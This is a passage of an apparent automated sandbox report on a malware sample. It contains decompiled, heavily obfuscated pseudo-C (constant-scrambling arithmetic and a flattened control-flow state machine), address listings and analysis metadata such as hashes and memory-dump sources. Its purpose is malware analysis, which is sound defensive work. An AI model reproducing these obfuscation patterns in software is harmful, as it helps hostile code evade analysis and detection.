                                                                                                                          				_v284 = _v284 / _t964;
                                                                                                                          				_v284 = _v284 + 0x8c1d;
                                                                                                                          				_v284 = _v284 ^ 0x00061f34;
                                                                                                                          				_v280 = 0xfdcbf7;
                                                                                                                          				_v280 = _v280 + 0x27a;
                                                                                                                          				_v280 = _v280 + 0xffff891b;
                                                                                                                          				_t965 = 0x46;
                                                                                                                          				_v280 = _v280 / _t965;
                                                                                                                          				_v280 = _v280 ^ 0x0008575c;
                                                                                                                          				_v284 = 0xc1d3a0;
                                                                                                                          				_v284 = _v284 >> 0xc;
                                                                                                                          				_v284 = _v284 << 2;
                                                                                                                          				_v284 = _v284 ^ 0x000b0f76;
                                                                                                                          				_v112 = 0xeee25;
                                                                                                                          				_v112 = _v112 << 0xc;
                                                                                                                          				_v112 = _v112 << 4;
                                                                                                                          				_v112 = _v112 ^ 0xee2c14e7;
                                                                                                                          				_v180 = 0x8a49b3;
                                                                                                                          				_v180 = _v180 | 0xb0d6dc69;
                                                                                                                          				_v180 = _v180 + 0xffffa02a;
                                                                                                                          				_v180 = _v180 | 0x7fd27f38;
                                                                                                                          				_v180 = _v180 ^ 0xffd81443;
                                                                                                                          				_v152 = 0x628374;
                                                                                                                          				_v152 = _v152 >> 2;
                                                                                                                          				_v152 = _v152 + 0xffff73d9;
                                                                                                                          				_t966 = 0x2e;
                                                                                                                          				_v152 = _v152 / _t966;
                                                                                                                          				_v152 = _v152 ^ 0x0001ef4a;
                                                                                                                          				_v28 = 0xe4a1af;
                                                                                                                          				_v28 = _v28 + 0x32bc;
                                                                                                                          				_v28 = _v28 ^ 0x00ec33da;
                                                                                                                          				_v160 = 0x595a50;
                                                                                                                          				_v160 = _v160 + 0xffffdbfa;
                                                                                                                          				_v160 = _v160 + 0xffffb344;
                                                                                                                          				_t967 = 0x36;
                                                                                                                          				_v160 = _v160 / _t967;
                                                                                                                          				_v160 = _v160 ^ 0x0006861f;
                                                                                                                          				_v88 = 0x4d7ad3;
                                                                                                                          				_v88 = _v88 + 0xc28a;
                                                                                                                          				_v88 = _v88 ^ 0x004ca34c;
                                                                                                                          				_v48 = 0xf1782b;
                                                                                                                          				_v48 = _v48 ^ 0xe8a77c51;
                                                                                                                          				_v48 = _v48 ^ 0xe85593aa;
                                                                                                                          				_v100 = 0x42ea8e;
                                                                                                                          				_t985 = 0x2a;
                                                                                                                          				_v100 = _v100 / _t985;
                                                                                                                          				_v100 = _v100 ^ 0x000caa85;
                                                                                                                          				_v148 = 0xa48e68;
                                                                                                                          				_t968 = 6;
                                                                                                                          				_v148 = _v148 / _t968;
                                                                                                                          				_v148 = _v148 << 0xc;
                                                                                                                          				_v148 = _v148 ^ 0xb6d58e9e;
                                                                                                                          				_v252 = 0x4ff2e7;
                                                                                                                          				_t969 = 0xc;
                                                                                                                          				_v252 = _v252 / _t969;
                                                                                                                          				_v252 = _v252 << 6;
                                                                                                                          				_v252 = _v252 << 0xc;
                                                                                                                          				_v252 = _v252 ^ 0xa6466867;
                                                                                                                          				_v80 = 0x4d7637;
                                                                                                                          				_v80 = _v80 + 0xd199;
                                                                                                                          				_v80 = _v80 ^ 0x004dfa45;
                                                                                                                          				_v24 = 0xfee4b3;
                                                                                                                          				_t970 = 0x3e;
                                                                                                                          				_v24 = _v24 * 0x23;
                                                                                                                          				_v24 = _v24 ^ 0x22d37c34;
                                                                                                                          				_v204 = 0x24209;
                                                                                                                          				_v204 = _v204 + 0xffffcebc;
                                                                                                                          				_v204 = _v204 ^ 0x847f2e61;
                                                                                                                          				_v204 = _v204 + 0xffff5302;
                                                                                                                          				_v204 = _v204 ^ 0x847f4f7c;
                                                                                                                          				_v260 = 0x4a587;
                                                                                                                          				_v260 = _v260 * 0x4a;
                                                                                                                          				_v260 = _v260 + 0xffff9bf3;
                                                                                                                          				_v260 = _v260 + 0xffff92e5;
                                                                                                                          				_v260 = _v260 ^ 0x015b504d;
                                                                                                                          				_v164 = 0x6d05db;
                                                                                                                          				_v164 = _v164 * 0x14;
                                                                                                                          				_v164 = _v164 >> 4;
                                                                                                                          				_v164 = _v164 ^ 0x556abaa4;
                                                                                                                          				_v164 = _v164 ^ 0x55e01079;
                                                                                                                          				_v20 = 0x80cc5b;
                                                                                                                          				_v20 = _v20 >> 0xd;
                                                                                                                          				_v20 = _v20 ^ 0x000efc86;
                                                                                                                          				_v104 = 0xc8e6e2;
                                                                                                                          				_v104 = _v104 << 8;
                                                                                                                          				_v104 = _v104 >> 0x10;
                                                                                                                          				_v104 = _v104 ^ 0x000afff3;
                                                                                                                          				_v272 = 0x560e69;
                                                                                                                          				_v272 = _v272 + 0x2793;
                                                                                                                          				_v272 = _v272 * 0xe;
                                                                                                                          				_v272 = _v272 + 0xc902;
                                                                                                                          				_v272 = _v272 ^ 0x04bc6edc;
                                                                                                                          				_v16 = 0xfcaf67;
                                                                                                                          				_v16 = _v16 / _t970;
                                                                                                                          				_v16 = _v16 ^ 0x000c0ba9;
                                                                                                                          				_v56 = 0x81a14f;
                                                                                                                          				_v56 = _v56 >> 0xb;
                                                                                                                          				_v56 = _v56 ^ 0x000fb9cd;
                                                                                                                          				_v32 = 0x24333c;
                                                                                                                          				_v32 = _v32 / _t985;
                                                                                                                          				_v32 = _v32 ^ 0x00065bee;
                                                                                                                          				_v124 = 0xe3a445;
                                                                                                                          				_v124 = _v124 >> 5;
                                                                                                                          				_v124 = _v124 >> 7;
                                                                                                                          				_v124 = _v124 ^ 0x0000dfdf;
                                                                                                                          				_v220 = 0x5f21d9;
                                                                                                                          				_t971 = 0x79;
                                                                                                                          				_v220 = _v220 * 0x54;
                                                                                                                          				_v220 = _v220 << 5;
                                                                                                                          				_v220 = _v220 ^ 0x0e372a7b;
                                                                                                                          				_v220 = _v220 ^ 0xe8dc9c41;
                                                                                                                          				_v188 = 0xc44d01;
                                                                                                                          				_v188 = _v188 ^ 0x0373dd04;
                                                                                                                          				_v188 = _v188 * 0x30;
                                                                                                                          				_v188 = _v188 ^ 0xfb03bbf0;
                                                                                                                          				_v188 = _v188 ^ 0x496460ca;
                                                                                                                          				_v268 = 0x8213af;
                                                                                                                          				_v268 = _v268 ^ 0x6d9501b2;
                                                                                                                          				_v268 = _v268 | 0x4d165578;
                                                                                                                          				_v268 = _v268 >> 4;
                                                                                                                          				_v268 = _v268 ^ 0x06d55fab;
                                                                                                                          				_v212 = 0x705526;
                                                                                                                          				_v212 = _v212 >> 0xa;
                                                                                                                          				_v212 = _v212 << 9;
                                                                                                                          				_v212 = _v212 >> 8;
                                                                                                                          				_v212 = _v212 ^ 0x000b72c4;
                                                                                                                          				_v92 = 0xc8093b;
                                                                                                                          				_v92 = _v92 + 0xd043;
                                                                                                                          				_v92 = _v92 ^ 0x00ca3bde;
                                                                                                                          				_v264 = 0x1f9619;
                                                                                                                          				_v264 = _v264 + 0xffffbc34;
                                                                                                                          				_v264 = _v264 * 0x3e;
                                                                                                                          				_v264 = _v264 * 0x52;
                                                                                                                          				_v264 = _v264 ^ 0x6e0edc82;
                                                                                                                          				_v96 = 0x6d9960;
                                                                                                                          				_v96 = _v96 | 0x9fb7a8f9;
                                                                                                                          				_v96 = _v96 ^ 0x9ff35e32;
                                                                                                                          				_v144 = 0x447df2;
                                                                                                                          				_v144 = _v144 << 8;
                                                                                                                          				_v144 = _v144 + 0xffff6cb2;
                                                                                                                          				_v144 = _v144 ^ 0x44714589;
                                                                                                                          				_v240 = 0x65db08;
                                                                                                                          				_v240 = _v240 * 6;
                                                                                                                          				_v240 = _v240 + 0x5f97;
                                                                                                                          				_v240 = _v240 >> 0xd;
                                                                                                                          				_v240 = _v240 ^ 0x000293b4;
                                                                                                                          				_v84 = 0x3c7c20;
                                                                                                                          				_v84 = _v84 ^ 0x2c3d49c2;
                                                                                                                          				_v84 = _v84 ^ 0x2c080053;
                                                                                                                          				_v248 = 0x13c85;
                                                                                                                          				_v248 = _v248 + 0x8cd8;
                                                                                                                          				_v248 = _v248 + 0x6e3d;
                                                                                                                          				_v248 = _v248 ^ 0xe59eace5;
                                                                                                                          				_v248 = _v248 ^ 0xe5984999;
                                                                                                                          				_v216 = 0x6164ef;
                                                                                                                          				_v216 = _v216 << 6;
                                                                                                                          				_v216 = _v216 + 0xffff2edc;
                                                                                                                          				_v216 = _v216 | 0xa66c888f;
                                                                                                                          				_v216 = _v216 ^ 0xbe7947d5;
                                                                                                                          				_v232 = 0x991e82;
                                                                                                                          				_v232 = _v232 + 0xffff48fb;
                                                                                                                          				_v232 = _v232 >> 0xe;
                                                                                                                          				_v232 = _v232 | 0x69e4ac2c;
                                                                                                                          				_v232 = _v232 ^ 0x69ef7d1b;
                                                                                                                          				_v68 = 0x9d94b2;
                                                                                                                          				_v68 = _v68 | 0xcead792c;
                                                                                                                          				_v68 = _v68 ^ 0xceb9e800;
                                                                                                                          				_v44 = 0x20071e;
                                                                                                                          				_v44 = _v44 / _t971;
                                                                                                                          				_v44 = _v44 ^ 0x000a654c;
                                                                                                                          				_v128 = 0x223cb7;
                                                                                                                          				_v128 = _v128 + 0x9bf0;
                                                                                                                          				_v128 = _v128 | 0x79b7d361;
                                                                                                                          				_v128 = _v128 ^ 0x79b3b147;
                                                                                                                          				_v52 = 0x8ed203;
                                                                                                                          				_v52 = _v52 + 0xffff1a7b;
                                                                                                                          				_v52 = _v52 ^ 0x008be8c4;
                                                                                                                          				_v208 = 0xe0ac17;
                                                                                                                          				_v208 = _v208 ^ 0xbcfe8cf2;
                                                                                                                          				_t972 = 0x6b;
                                                                                                                          				_v208 = _v208 / _t972;
                                                                                                                          				_v208 = _v208 | 0x3ee9ec5f;
                                                                                                                          				_v208 = _v208 ^ 0x3fec9c1d;
                                                                                                                          				_v192 = 0x219bfa;
                                                                                                                          				_v192 = _v192 >> 4;
                                                                                                                          				_v192 = _v192 + 0x77e4;
                                                                                                                          				_v192 = _v192 | 0x2fb4141c;
                                                                                                                          				_v192 = _v192 ^ 0x2fb2076e;
                                                                                                                          				_v200 = 0x8926e2;
                                                                                                                          				_v200 = _v200 << 4;
                                                                                                                          				_t973 = 0xc;
                                                                                                                          				_v200 = _v200 / _t973;
                                                                                                                          				_v200 = _v200 + 0xffff5704;
                                                                                                                          				_v200 = _v200 ^ 0x00bbfbcc;
                                                                                                                          				_v284 = 0xaed0cb;
                                                                                                                          				_v284 = _v284 + 0x9c17;
                                                                                                                          				_v284 = _v284 + 0xaf6d;
                                                                                                                          				_v284 = _v284 ^ 0x00b89bc1;
                                                                                                                          				_v168 = 0x914ce9;
                                                                                                                          				_v168 = _v168 | 0xceb3d4af;
                                                                                                                          				_v168 = _v168 ^ 0x5adaba1c;
                                                                                                                          				_v168 = _v168 ^ 0x3c292fbf;
                                                                                                                          				_v168 = _v168 ^ 0xa84ea968;
                                                                                                                          				_v156 = 0x90c891;
                                                                                                                          				_v156 = _v156 + 0xffff3667;
                                                                                                                          				_t974 = 0x5c;
                                                                                                                          				_v156 = _v156 / _t974;
                                                                                                                          				_t975 = 0x3c;
                                                                                                                          				_v156 = _v156 / _t975;
                                                                                                                          				_v156 = _v156 ^ 0x000da682;
                                                                                                                          				_v140 = 0xffcb83;
                                                                                                                          				_v140 = _v140 << 0xd;
                                                                                                                          				_v140 = _v140 | 0xcebab625;
                                                                                                                          				_v140 = _v140 ^ 0xfff71570;
                                                                                                                          				_v280 = 0xfef1ee;
                                                                                                                          				_v280 = _v280 >> 8;
                                                                                                                          				_v280 = _v280 + 0xffff306e;
                                                                                                                          				_v280 = _v280 | 0x3331510b;
                                                                                                                          				_v280 = _v280 ^ 0x3338227a;
                                                                                                                          				_v176 = 0xc7331d;
                                                                                                                          				_v176 = _v176 >> 7;
                                                                                                                          				_v176 = _v176 + 0x1d50;
                                                                                                                          				_v176 = _v176 << 5;
                                                                                                                          				_v176 = _v176 ^ 0x00370898;
                                                                                                                          				_v288 = 0x519041;
                                                                                                                          				_v288 = _v288 + 0x7cd9;
                                                                                                                          				_v288 = _v288 ^ 0x0057f5a9;
                                                                                                                          				_t976 = _v12;
                                                                                                                          				_t986 = _v12;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t939 = 0x68a9e90;
                                                                                                                          					while(1) {
                                                                                                                          						_t823 = _v184;
                                                                                                                          						while(1) {
                                                                                                                          							L3:
                                                                                                                          							_t991 = _t977 - _t939;
                                                                                                                          							if(_t991 > 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							if(_t991 == 0) {
                                                                                                                          								__eflags =  *_v8;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									_push(_v104);
                                                                                                                          									_push(_v20);
                                                                                                                          									_t868 = E007ADCF7(_v164, 0x791524, __eflags);
                                                                                                                          									_v276 = _t868;
                                                                                                                          								}
                                                                                                                          								_t845 = _v244 | _v196 | _v108 | _v236 | _v132 | _v172 | _v64 | _v228 | _v116;
                                                                                                                          								_t981 = _a44 & 1;
                                                                                                                          								__eflags = _t981;
                                                                                                                          								if(_t981 != 0) {
                                                                                                                          									__eflags = _t845;
                                                                                                                          								}
                                                                                                                          								_push(_t868);
                                                                                                                          								_t976 = E007975FA(_t868, _t845, _v272, _t868, _v16, _a16, _v56, _v32, _v124, _t868, _v220, _v188, _v184);
                                                                                                                          								E0079A8B0(_v268, _v276, _v212);
                                                                                                                          								_t988 =  &(_t988[0xe]);
                                                                                                                          								__eflags = _t976;
                                                                                                                          								if(_t976 == 0) {
                                                                                                                          									_t977 = 0x51daea9;
                                                                                                                          								} else {
                                                                                                                          									_push(_v96);
                                                                                                                          									_push(_v264);
                                                                                                                          									_push(_v256);
                                                                                                                          									_v60 = 1;
                                                                                                                          									_push( &_v60);
                                                                                                                          									_push(_v92);
                                                                                                                          									_t948 = 4;
                                                                                                                          									E00799670(_t976, _t948);
                                                                                                                          									_t988 =  &(_t988[5]);
                                                                                                                          									__eflags = _t981;
                                                                                                                          									if(_t981 != 0) {
                                                                                                                          										E007A408E( &_v12, _v76, _v144, _v240, _t976,  &_v60, _v84, _v248);
                                                                                                                          										_t732 =  &_v60;
                                                                                                                          										 *_t732 = _v60 | _v136;
                                                                                                                          										__eflags =  *_t732;
                                                                                                                          										E00799670(_t976, _v12, _v216,  &_v60, _v224, _v232, _v68);
                                                                                                                          										_t988 =  &(_t988[0xb]);
                                                                                                                          									}
                                                                                                                          									_t977 = 0xbee37f5;
                                                                                                                          								}
                                                                                                                          								L11:
                                                                                                                          								_t868 = _v276;
                                                                                                                          								goto L1;
                                                                                                                          							}
                                                                                                                          							if(_t977 == 0x2602436) {
                                                                                                                          								_t977 = 0x506ebc3;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							if(_t977 == 0x329d839) {
                                                                                                                          								_t977 = 0x2602436;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							if(_t977 == 0x4bb42fe) {
                                                                                                                          								_t823 = E007988C3(_v100, _v148, _v40, _t868, _t868, _t986, _v252, _v80, _a36, _v24, _t868, _v4, _t868, _v204, _v260);
                                                                                                                          								_t868 = _v276;
                                                                                                                          								_t988 =  &(_t988[0xd]);
                                                                                                                          								__eflags = _t823;
                                                                                                                          								_v184 = _t823;
                                                                                                                          								_t939 = 0x68a9e90;
                                                                                                                          								_t977 =  !=  ? 0x68a9e90 : 0x9a35046;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							if(_t977 == 0x506ebc3) {
                                                                                                                          								_push(_t868);
                                                                                                                          								_push(_v72);
                                                                                                                          								_push(_v160);
                                                                                                                          								_push(_v28);
                                                                                                                          								_push(_v152);
                                                                                                                          								_t858 = E007ADAC6(_v112, _v180);
                                                                                                                          								_t986 = _t858;
                                                                                                                          								__eflags = _t858;
                                                                                                                          								_t977 =  !=  ? 0x4bb42fe : 0xdf8c541;
                                                                                                                          								E007A8519(_v88, _v48, 0);
                                                                                                                          								_t988 = _t988 - 0xc + 0x24;
                                                                                                                          								L37:
                                                                                                                          								_t868 = _v276;
                                                                                                                          								_t939 = 0x68a9e90;
                                                                                                                          								L38:
                                                                                                                          								__eflags = _t977 - 0xdf8c541;
                                                                                                                          								if(_t977 == 0xdf8c541) {
                                                                                                                          									L41:
                                                                                                                          									return _t862;
                                                                                                                          								}
                                                                                                                          								_t823 = _v184;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							if(_t977 != 0x51daea9) {
                                                                                                                          								goto L38;
                                                                                                                          							}
                                                                                                                          							E00792B62(_v168, _t823, _v156, _v140);
                                                                                                                          							_t977 = 0x9a35046;
                                                                                                                          							goto L11;
                                                                                                                          						}
                                                                                                                          						__eflags = _t977 - 0x81a6b17;
                                                                                                                          						if(_t977 == 0x81a6b17) {
                                                                                                                          							E00792B62(_v192, _t976, _v200, _v284);
                                                                                                                          							_t977 = 0x51daea9;
                                                                                                                          							goto L37;
                                                                                                                          						}
                                                                                                                          						__eflags = _t977 - 0x9a35046;
                                                                                                                          						if(_t977 == 0x9a35046) {
                                                                                                                          							E00792B62(_v280, _t986, _v176, _v288);
                                                                                                                          							goto L41;
                                                                                                                          						}
                                                                                                                          						__eflags = _t977 - 0xb70b8d2;
                                                                                                                          						if(_t977 == 0xb70b8d2) {
                                                                                                                          							__eflags = E007AA2E8(_t976, _a4);
                                                                                                                          							_t977 = 0x81a6b17;
                                                                                                                          							_t829 = 1;
                                                                                                                          							_t862 =  !=  ? _t829 : _t862;
                                                                                                                          							goto L11;
                                                                                                                          						}
                                                                                                                          						__eflags = _t977 - 0xba06d79;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							__eflags = E007B09B5(_t976, _v120, __eflags) - _v36;
                                                                                                                          							_t977 =  ==  ? 0xb70b8d2 : 0x81a6b17;
                                                                                                                          							goto L11;
                                                                                                                          						}
                                                                                                                          						__eflags = _t977 - 0xbee37f5;
                                                                                                                          						if(_t977 != 0xbee37f5) {
                                                                                                                          							goto L38;
                                                                                                                          						}
                                                                                                                          						_t832 = _v8;
                                                                                                                          						_t888 =  *_t832;
                                                                                                                          						__eflags = _t888;
                                                                                                                          						if(_t888 == 0) {
                                                                                                                          							_t833 = 0;
                                                                                                                          							__eflags = 0;
                                                                                                                          						} else {
                                                                                                                          							_t833 = _t832[1];
                                                                                                                          						}
                                                                                                                          						E00792AE4(_v44, _t888, _t888, _a24, _t976, _v52, _t833, _v208);
                                                                                                                          						_t988 =  &(_t988[7]);
                                                                                                                          						asm("sbb esi, esi");
                                                                                                                          						_t977 = (_t977 & 0x03860262) + 0x81a6b17;
                                                                                                                          						goto L11;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}
                                                                                                                          0x007ae75a
                                                                                                                          0x007ae762
                                                                                                                          0x007ae767
                                                                                                                          0x007ae76f
                                                                                                                          0x007ae777
                                                                                                                          0x007ae77f
                                                                                                                          0x007ae787
                                                                                                                          0x007ae791
                                                                                                                          0x007ae796
                                                                                                                          0x007ae79e
                                                                                                                          0x007ae7ac
                                                                                                                          0x007ae7b1
                                                                                                                          0x007ae7b7
                                                                                                                          0x007ae7bf
                                                                                                                          0x007ae7cb
                                                                                                                          0x007ae7d0
                                                                                                                          0x007ae7d6
                                                                                                                          0x007ae7de
                                                                                                                          0x007ae7ea
                                                                                                                          0x007ae7ef
                                                                                                                          0x007ae7f5
                                                                                                                          0x007ae7fd
                                                                                                                          0x007ae805
                                                                                                                          0x007ae80d
                                                                                                                          0x007ae815
                                                                                                                          0x007ae821
                                                                                                                          0x007ae826
                                                                                                                          0x007ae82c
                                                                                                                          0x007ae834
                                                                                                                          0x007ae83c
                                                                                                                          0x007ae841
                                                                                                                          0x007ae846
                                                                                                                          0x007ae84e
                                                                                                                          0x007ae859
                                                                                                                          0x007ae861
                                                                                                                          0x007ae869
                                                                                                                          0x007ae874
                                                                                                                          0x007ae87f
                                                                                                                          0x007ae88a
                                                                                                                          0x007ae895
                                                                                                                          0x007ae8a0
                                                                                                                          0x007ae8ab
                                                                                                                          0x007ae8b6
                                                                                                                          0x007ae8be
                                                                                                                          0x007ae8d0
                                                                                                                          0x007ae8d5
                                                                                                                          0x007ae8de
                                                                                                                          0x007ae8e9
                                                                                                                          0x007ae8f4
                                                                                                                          0x007ae8ff
                                                                                                                          0x007ae90a
                                                                                                                          0x007ae915
                                                                                                                          0x007ae920
                                                                                                                          0x007ae932
                                                                                                                          0x007ae935
                                                                                                                          0x007ae93c
                                                                                                                          0x007ae947
                                                                                                                          0x007ae952
                                                                                                                          0x007ae95d
                                                                                                                          0x007ae968
                                                                                                                          0x007ae973
                                                                                                                          0x007ae97e
                                                                                                                          0x007ae989
                                                                                                                          0x007ae99f
                                                                                                                          0x007ae9a4
                                                                                                                          0x007ae9ab
                                                                                                                          0x007ae9b6
                                                                                                                          0x007ae9ca
                                                                                                                          0x007ae9cf
                                                                                                                          0x007ae9d6
                                                                                                                          0x007ae9de
                                                                                                                          0x007ae9e9
                                                                                                                          0x007ae9f7
                                                                                                                          0x007ae9fc
                                                                                                                          0x007aea00
                                                                                                                          0x007aea05
                                                                                                                          0x007aea0a
                                                                                                                          0x007aea12
                                                                                                                          0x007aea1d
                                                                                                                          0x007aea28
                                                                                                                          0x007aea33
                                                                                                                          0x007aea48
                                                                                                                          0x007aea49
                                                                                                                          0x007aea50
                                                                                                                          0x007aea5b
                                                                                                                          0x007aea63
                                                                                                                          0x007aea6b
                                                                                                                          0x007aea73
                                                                                                                          0x007aea7b
                                                                                                                          0x007aea83
                                                                                                                          0x007aea90
                                                                                                                          0x007aea94
                                                                                                                          0x007aea9c
                                                                                                                          0x007aeaa4
                                                                                                                          0x007aeaac
                                                                                                                          0x007aeabf
                                                                                                                          0x007aeac6
                                                                                                                          0x007aeace
                                                                                                                          0x007aead9
                                                                                                                          0x007aeae4
                                                                                                                          0x007aeaef
                                                                                                                          0x007aeaf7
                                                                                                                          0x007aeb02
                                                                                                                          0x007aeb0d
                                                                                                                          0x007aeb15
                                                                                                                          0x007aeb1d
                                                                                                                          0x007aeb28
                                                                                                                          0x007aeb30
                                                                                                                          0x007aeb3d
                                                                                                                          0x007aeb41
                                                                                                                          0x007aeb49
                                                                                                                          0x007aeb51
                                                                                                                          0x007aeb67
                                                                                                                          0x007aeb6e
                                                                                                                          0x007aeb79
                                                                                                                          0x007aeb84
                                                                                                                          0x007aeb8c
                                                                                                                          0x007aeb97
                                                                                                                          0x007aebab
                                                                                                                          0x007aebb2
                                                                                                                          0x007aebbd
                                                                                                                          0x007aebc8
                                                                                                                          0x007aebd2
                                                                                                                          0x007aebda
                                                                                                                          0x007aebe5
                                                                                                                          0x007aebf4
                                                                                                                          0x007aebf5
                                                                                                                          0x007aebf9
                                                                                                                          0x007aebfe
                                                                                                                          0x007aec06
                                                                                                                          0x007aec0e
                                                                                                                          0x007aec16
                                                                                                                          0x007aec23
                                                                                                                          0x007aec27
                                                                                                                          0x007aec2f
                                                                                                                          0x007aec37
                                                                                                                          0x007aec3f
                                                                                                                          0x007aec47
                                                                                                                          0x007aec4f
                                                                                                                          0x007aec54
                                                                                                                          0x007aec5c
                                                                                                                          0x007aec64
                                                                                                                          0x007aec69
                                                                                                                          0x007aec6e
                                                                                                                          0x007aec73
                                                                                                                          0x007aec7b
                                                                                                                          0x007aec86
                                                                                                                          0x007aec91
                                                                                                                          0x007aec9c
                                                                                                                          0x007aeca4
                                                                                                                          0x007aecb1
                                                                                                                          0x007aecba
                                                                                                                          0x007aecbe
                                                                                                                          0x007aecc6
                                                                                                                          0x007aecd1
                                                                                                                          0x007aecdc
                                                                                                                          0x007aece7
                                                                                                                          0x007aecf2
                                                                                                                          0x007aecfa
                                                                                                                          0x007aed05
                                                                                                                          0x007aed10
                                                                                                                          0x007aed1d
                                                                                                                          0x007aed21
                                                                                                                          0x007aed29
                                                                                                                          0x007aed2e
                                                                                                                          0x007aed36
                                                                                                                          0x007aed41
                                                                                                                          0x007aed4c
                                                                                                                          0x007aed57
                                                                                                                          0x007aed5f
                                                                                                                          0x007aed67
                                                                                                                          0x007aed6f
                                                                                                                          0x007aed77
                                                                                                                          0x007aed7f
                                                                                                                          0x007aed87
                                                                                                                          0x007aed8c
                                                                                                                          0x007aed94
                                                                                                                          0x007aed9c
                                                                                                                          0x007aeda4
                                                                                                                          0x007aedac
                                                                                                                          0x007aedb4
                                                                                                                          0x007aedb9
                                                                                                                          0x007aedc1
                                                                                                                          0x007aedc9
                                                                                                                          0x007aedd4
                                                                                                                          0x007aeddf
                                                                                                                          0x007aedea
                                                                                                                          0x007aedfe
                                                                                                                          0x007aee05
                                                                                                                          0x007aee10
                                                                                                                          0x007aee1b
                                                                                                                          0x007aee26
                                                                                                                          0x007aee31
                                                                                                                          0x007aee3c
                                                                                                                          0x007aee49
                                                                                                                          0x007aee54
                                                                                                                          0x007aee5f
                                                                                                                          0x007aee67
                                                                                                                          0x007aee75
                                                                                                                          0x007aee7a
                                                                                                                          0x007aee80
                                                                                                                          0x007aee88
                                                                                                                          0x007aee90
                                                                                                                          0x007aee98
                                                                                                                          0x007aee9d
                                                                                                                          0x007aeea5
                                                                                                                          0x007aeead
                                                                                                                          0x007aeeb5
                                                                                                                          0x007aeebd

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: |<$!b$&Up$*b$7vM$<3$$=n$C$FKa$K1$Le$PZY$S$_>$z"83$u$0G$da$w
                                                                                                                          • API String ID: 0-2766407278
                                                                                                                          • Opcode ID: 68dd77f2d84884ed3608c2f031be7d0ec045248f74ef94b6f2e9b111c8a000c6
                                                                                                                          • Instruction ID: ecf87c77bc4e274d36eab8ab868bdfd1ed1b099a15f8a948d6144544d8318809
                                                                                                                          • Opcode Fuzzy Hash: 68dd77f2d84884ed3608c2f031be7d0ec045248f74ef94b6f2e9b111c8a000c6
                                                                                                                          • Instruction Fuzzy Hash: BE820F71508381CFD378CF25C54AA8BBBE1BBD5718F108A2DE2D996260D7B48949CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E0079BB7E(intOrPtr* __ecx) {
                                                                                                                          				char _v68;
                                                                                                                          				char _v76;
                                                                                                                          				void* _v88;
                                                                                                                          				intOrPtr _v92;
                                                                                                                          				intOrPtr _v96;
                                                                                                                          				intOrPtr* _v100;
                                                                                                                          				char _v104;
                                                                                                                          				char _v108;
                                                                                                                          				char _v112;
                                                                                                                          				char _v116;
                                                                                                                          				char _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				signed int _v140;
                                                                                                                          				signed int _v144;
                                                                                                                          				signed int _v148;
                                                                                                                          				signed int _v152;
                                                                                                                          				signed int _v156;
                                                                                                                          				signed int _v160;
                                                                                                                          				signed int _v164;
                                                                                                                          				signed int _v168;
                                                                                                                          				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				void* _t690;
				void* _t691;
				void* _t697;
				void* _t700;
				void* _t701;
				void* _t704;
				void* _t710;
				char _t711;
				void* _t713;
				void* _t717;
				void* _t719;
				void* _t725;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				void* _t747;
				void* _t763;
				void* _t772;
				void* _t819;
				intOrPtr _t834;
				void* _t840;
				void* _t842;
				void* _t846;
				void* _t847;
				void* _t850;

				_v92 = 0xf68129;
				_v100 = __ecx;
				asm("stosd");
				_t732 = 0x6b;
				asm("stosd");
				_t846 = 0;
				_t725 = 0x7252bf3;
				asm("stosd");
				_v136 = 0x5ab987;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 ^ 0x0f97e334;
				_v240 = 0x5f59f0;
				_v240 = _v240 << 5;
				_v240 = _v240 * 0x46;
				_v240 = _v240 ^ 0x4252f400;
				_v320 = 0x63212;
				_v320 = _v320 + 0xffffd9b7;
				_v320 = _v320 * 0x26;
				_v320 = _v320 + 0xffff4af1;
				_v320 = _v320 ^ 0x00e50ac7;
				_v192 = 0x354250;
				_t26 =  &_v192; // 0x354250
				_v192 =  *_t26 * 0x43;
